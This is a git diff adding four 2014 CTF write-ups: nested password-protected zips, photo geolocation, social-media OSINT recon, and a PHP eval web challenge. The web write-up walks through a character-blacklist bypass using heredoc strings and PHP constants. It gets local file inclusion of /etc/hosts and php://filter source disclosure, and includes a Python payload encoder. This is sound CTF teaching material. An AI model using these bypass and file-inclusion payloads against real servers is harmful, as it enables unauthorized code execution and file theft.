Add writeups created in 2014

_posts/2014-03-05-defkthon-misc-300.markdown

@@ -0,0 +1,43 @@
+---
+layout: post
+title:  "DEFKTHON 2014 Misc 300"
+date:   2014-03-05
+categories: writeups defkthon 2014 misc 300
+author: phil9l
+comments: true
+---
+
+Try to extract downloaded *73168.zip*. It's password protected, but we can see that there is only *46783.zip* file inside. So try password *46783*.
+
+![]({{ site.baseurl }}/assets/2014-03-05-defkthon-misc-300/screen_01.png){: .center-image }
+<!-- more -->
+
+It's successfuly unpacked. Try to do the same with *46783.zip*. Now we have the next one - *47096.zip*. Unpacking by hands seems too hard so write the python script:
+
+{% highlight python linenos=table %}
+#!/usr/bin/env python2
+# -*- coding: utf-8 -*-
+
+import zipfile
+
+sFile = '42819.zip'
+while True:
+  tz = zipfile.ZipFile(sFile).namelist()
+  if (len(tz) > 1):
+  print '[!]{0} contains more then one file!'.format(sFile)
+  if tz[0][-4:] == '.zip':
+  tzip = zipfile.ZipFile(sFile, "r")
+  tzip.setpassword(tz[0][:-4])
+  tzip.extractall()
+  tzip.close()
+  print '[+]{0} was unpacked successfuly.'.format(sFile)
+  sFile = tz[0]
+  else:
+  print '[!]Finished.'
+{% endhighlight %}
+
+Wait about 40 minutes. Than we have 1.510 archives and there is *mess.wav* file in the last one. Brute password for this archive (it is "**b0yzz**").
+
+Try to listen *mess.wav*, undestand that we can hear nothing. Try to vi this file, nothing interesting again. Let's now try to see it's spectogram. We can now see the key here - "**BallsRealBolls**".
+
+![]({{ site.baseurl }}/assets/2014-03-05-defkthon-misc-300/screen_02.png){: .center-image }

_posts/2014-03-31-volgactf-quals-joy-500.markdown

@@ -0,0 +1,40 @@
+---
+layout: post
+title:  "VolgaCTF Quals 2014 Joy 500"
+date:   2014-03-31
+categories: writeups volgactf quals 2014 joy 500
+author: phil9l
+comments: true
+---
+
+The *[the+monument+rocket.PSD]({{ site.baseurl }}/assets/2014-03-31-volgactf-quals-joy-500/the%2Bmonument%2Brocket.PSD)* was given. Opening it with Photoshop fails. So I checked the file type:
+
+{% highlight bash %}
+$ file the+monument+rocket.PSD
+the+monument+rocket.PSD: JPEG image data, EXIF standard 2.21
+{% endhighlight %}
+
+Well, let's try to open this file as jpeg. It opens succesfully (there's a reduced version below).
+
+![]({{ site.baseurl }}/assets/2014-03-31-volgactf-quals-joy-500/the%2Bmonument%2Brocket.jpeg){: .center-image }
+<!-- more -->
+
+After that I tried to view [EXIF data]({{ site.baseurl }}/assets/2014-03-31-volgactf-quals-joy-500/exif_data.txt).
+
+The only useful think here can be the owner name. I have found only a girl in vk but she seemed useless for this task.
+
+The file name looks unusual. I googled it and found some mentions of Samara.
+
+Well, let's now take a closer look to the photo. First, I saw a man with a poster and inscription "Мяги 7". While googling this phrase I found only a [vk post](http://vk.com/wall-9173984_212799). Hm, desription of Samara again, I hoped I can believe them and look for the answer in this city.
+
+![]({{ site.baseurl }}/assets/2014-03-31-volgactf-quals-joy-500/screen2.png){: .center-image }
+
+Ok, let's try to choose some unusual buildings. I found remarkable only a church but for a long time I could not find it. Later I found the number of a house (99 or 199). It can be really useful for us!
+
+![]({{ site.baseurl }}/assets/2014-03-31-volgactf-quals-joy-500/screen3.png){: .center-image }
+
+Maybe now we have everything to solve this task? I tried to mark all 199 houses on map (blue color), all churches (red color). It's easy to find answer now just bruting all the houses and comparing them with photo. But I had a problem: it is less then 5 minutes left to solve this task. I almost resigned but tried to find something in google. And it happened! I found this church! I marked it with a yellow point on the map.
+
+<script type="text/javascript" charset="utf-8" src="//api-maps.yandex.ru/services/constructor/1.0/js/?sid=UYn3wiEw5_OOPzYlJ9Xw-axYDQBLEUld&width=600&height=450"></script>
+
+Very nice, only two houses are near this church but I have about two minutes. The nearest one looks wrong so I thought that the needed house is a green one on the map. Now we only need to find a point that the foreshortening will be the same as the one on the. Obviously, it is a *Karla Marksa prospect 192* (purple point). So the flag is **KarlaMarksa192** and it's even 5 seconds to the end.

_posts/2014-04-01-volgactf-quals-recon-300.markdown

@@ -0,0 +1,27 @@
+---
+layout: post
+title:  "VolgaCTF Quals 2014 Recon 300"
+date:   2014-04-01
+categories: writeups volgactf quals 2014 recon 300
+author: phil9l
+comments: true
+---
+
+We have [a facebook page](https://www.facebook.com/yan.vetrov.96). Firstly, let's check the information. We can find his [Instagram](https://instagram.com/fin_163/), [vk page](https://vk.com/vetroyan) and [a site](http://www.colorflip.com/).
+
+![]({{ site.baseurl }}/assets/2014-04-01-volgactf-quals-recon-300/screen1.png){: .center-image }
+
+To finish with facebook page I decided to read his post. In [one message](https://www.facebook.com/yan.vetrov.96/posts/1390152937928284?stream_ref=10) he writes that he want to download free music and about VK music.
+<!-- more -->
+
+I wished to start with the [site](http://www.colorflip.com/) where we can just flip the pages. I read the site's code fast and found nothing interesting there but the comments are nice. May be I missed something? Ok, we always can return to this site. Let's now go to the vk page.
+
+![]({{ site.baseurl }}/assets/2014-04-01-volgactf-quals-recon-300/screen2.png){: .center-image }
+
+Ok, we still remember about VK music, so let's visit his [vk page](https://vk.com/vetroyan). Firstly, we can see [the post](http://vk.com/wall43944111_5) where he asks about opening password-protected zip. Bruting password works fine and we can get it easy: *228322* (funny one). There is only a *O_o.txt* file with text "*o_O what are u doing here?*". Just a joke I think. Ok, no more interesting posts but we remember about music, don't we?
+
+![]({{ site.baseurl }}/assets/2014-04-01-volgactf-quals-recon-300/screen3.png){: .center-image }
+
+One song is really suspicious: *Easy flag &mdash; here*. Listening it seems useless. But we can download it, maybe we would find something interesting there? Of course, it is here! On the cover. So the flag is **s0_much_music**.
+
+![]({{ site.baseurl }}/assets/2014-04-01-volgactf-quals-recon-300/screen4.png){: .center-image }

_posts/2014-04-04-volgactf-quals-web-300.markdown

@@ -0,0 +1,149 @@
+---
+layout: post
+title:  "VolgaCTF Quals 2014 Web 300"
+date:   2014-04-04
+categories: writeups volgactf quals 2014 web 300
+author: hx
+comments: true
+---
+
+In this task we have a script at *[http://tasks.2014.volgactf.ru:28103/](http://tasks.2014.volgactf.ru:28103/)* that
+accepts GET parameter *e* looking like a command. If command is valid, a result will be printed, otherwise we will get a blank
+page. The first question - what language this command is written on?
+<!-- more -->
+
+From the task's hint I found that command *echo pi* is valid. I tried to experiment and have found another valid command
+*print pi*. I knew only one language accepting both of this commands - PHP. This guess looked good because the page on the
+site was written on PHP (it's possible to append *index.php* to the page URL).
+
+I've googled that there is no constant named *pi* in PHP (there is *M_PI* constant instead of it), but there is
+[*pi()* function](https://secure.php.net/manual/en/function.pi.php). Therefore I've guessed that characters *();* are appended to the executed line. The assumption was correct because [*phpinfo* command](http://tasks.2014.volgactf.ru:28103/?e=phpinfo) was transformed to
+*phpinfo();* call.
+
+I understood that it's possible to execute a code on the server, but I faced a problem - some symbols were filtered. When I was
+testing what symbols were filtered I supposed that writing the URL address in a browser is really uncomfortable because some characters
+such as *+* and *%* weren't encoded and behave in a wrong way. So I decided to encode them and send requests to the site
+using [ipython](http://ipython.org/).
+
+For instance, these lines of code proves that comma is removed from the command (otherwise the comma would be inserted into word *pi* and broke the code):
+
+{% highlight python %}
+In [1]: import urllib
+
+In [2]: print urllib.urlopen('http://tasks.2014.volgactf.ru:28103/?' + urllib.urlencode({'e': 'echo p,i'})).read()
+3.1415926535898
+{% endhighlight %}
+
+So, I've found out that this special symbols are banned:
+{% highlight php %}
+` ' " $ # * ^ : ; ( ) > / \
+{% endhighlight %}
+
+At the same time letters, digits and other special symbols, including the newline character, were allowed.
+
+It wasn't clear how to execute a useful code in these conditions. At first sight, we aren't able to send string constants at
+all. But we can remember heredoc-style string constants:
+
+{% highlight php %}
+$str = <<<EOF
+string content
+EOF;
+{% endhighlight %}
+
+That's equivalent to:
+
+{% highlight php %}
+$str = "string content";
+{% endhighlight %}
+
+In this case we can use such constants because *<* character and the newline are available to us. Also it's important that we can concatenate strings using the dot.
+
+Characters */* and *:* are necessary for sending paths to files and URLs. We can take these symbols from magic constants like *\_\_DIR\_\_*, but in PHP < 5.5 it's possible to get a character from a string by index only if the string kept in a variable (this behavior seems quite strange for me). According *phpinfo()*, the server
+had PHP 5.4, and we can't use variables because character *$* is prohibited.
+
+I often use Python, so I suggested that there's a constant in PHP similar to Python's *os.path.sep* (a constant that contains a directory separator in paths, usually */* or *\\*). Fortunately, it appeared that such constant really exists in PHP and named
+*DIRECTORY_SEPARATOR*. The similar constant containing the colon named *PATH_SEPARATOR*
+([docs](http://www.php.net/manual/en/dir.constants.php)).
+
+The next question is how to use the defined strings. The parentheses are prohibited on the server, so we can't call functions, but we can use language constructions like *include* or *require* to read files.
+
+The other task is to neutralize empty brackets appended to the command by the server. It can be solved by concatenation with the
+result of *printf* function without arguments. In general, this function can't be called without arguments. Nevertheless, the
+interpreter just will print a warning in this case and won't stop script execution. The function returns an empty string, so the concatenation won't have any impact on the obtained string.
+
+All these tricks allow us to use LFI (Local File Inclusion) vulnerability. We can include local files using a path encoded with heredoc-style constants and constants like *DIRECTORY_SEPARATOR*. For example, to view */etc/hosts* file we need to send the following command to the server:
+
+{% highlight php %}
+include DIRECTORY_SEPARATOR.<<<EOF
+etc
+EOF
+.DIRECTORY_SEPARATOR.<<<EOF
+hosts
+EOF
+.printf
+{% endhighlight %}
+
+The server have added characters *();* to this command, so it became equivalent to the following:
+
+{% highlight php %}
+include "/etc/hosts".printf();
+{% endhighlight %}
+
+During inclusion of */etc/hosts*, a PHP interpreter won't find any PHP code and will simply print contents of this file. Now we can read local files if they don't contain PHP code. The next question - where is the flag?
+
+I thought that it is necessary to check possibility of RFI (Remote File Inclusion). For this purpose I tried to include link like
+*http://example.com/*. For convenience I wrote the following script on Python, which encodes the necessary command and
+receives its result:
+
+{% highlight python linenos=table %}
+#!/usr/bin/env python2
+# -*- coding: utf-8 -*-
+
+import re
+import urllib
+
+def heredoc(str):
+    return ' <<<EOF\n%s\nEOF\n' % str
+
+def encode_path(str):
+    encoded = re.sub(r'[a-zA-Z0-9.-]+',
+                     lambda match: heredoc(match.group()) + '.',
+                     str)
+    encoded = encoded.replace('/', 'DIRECTORY_SEPARATOR.')
+    encoded = encoded.replace(':', 'PATH_SEPARATOR.')
+    return encoded
+
+encoded_path = encode_path('http://volgactf.ru/news/nachalobeginning')
+params = urllib.urlencode({'e': 'include %sprintf()' % encoded_path})
+print urllib.urlopen('http://tasks.2014.volgactf.ru:28103/?' + params).read()
+{% endhighlight %}
+
+Unfortunately, the attempt of RFI failed (the server returned an empty line on a correct request). This failure gave me a wrong idea that if HTTP protocol isn't processed, then *allow_url_include = off* and no URL protocols are processed at all.
+
+I tried to find the file containing the flag. Popular paths like */home/volga/flag* weren't suited, so I tried to
+upload a PHP shell to explore contents of various directories. Despite the LFI, it was impossible to upload the shell because writeable files weren't found: I found a configuration of Apache but files with logs weren't readable as well as  descriptors of the current process in */proc/self/fd/*.
+
+Here my friend *Phil9l* advised me to look for the flag in a source code of *index.php*, because the flag often located there in similar tasks. It was impossible to include the source code of the script
+directly, but it appeared that the directive *allow_url_include = off* doesn't forbid *php://* URL usage ([docs](https://secure.php.net/manual/en/wrappers.php.php)).
+
+So, we can use *php://filter/* URLs to receive local files in different encodings. For example, with *php://filter/convert.base64-encode/* we can encode file to Base64
+([docs](https://secure.php.net/manual/en/filters.convert.php)). Then the script won't be executed, and it's possible to
+decode its source code from Base64. Let's retrieve *index.php* source with the following command:
+
+{% highlight php %}
+include 'php://filter/convert.base64-encode/resource=index.php';
+{% endhighlight %}
+
+There's no problem to encode this URL with the Python script above and execute it on the server. After decoding we will see the following source:
+
+{% highlight php %}
+<?
+sleep(1);
+$f= $_GET['e'];
+$f = str_replace(array('`','$','*','#',':','\\','"','(',')','>','\'','/','^',';'),'', $f);
+die(@eval("$f();"));
+
+FLAG?: OUR_WEBBA_IS_A_LAZY_DOUCHEBAG;
+{% endhighlight %}
+
+So, the flag is **OUR_WEBBA_IS_A_LAZY_DOUCHEBAG**.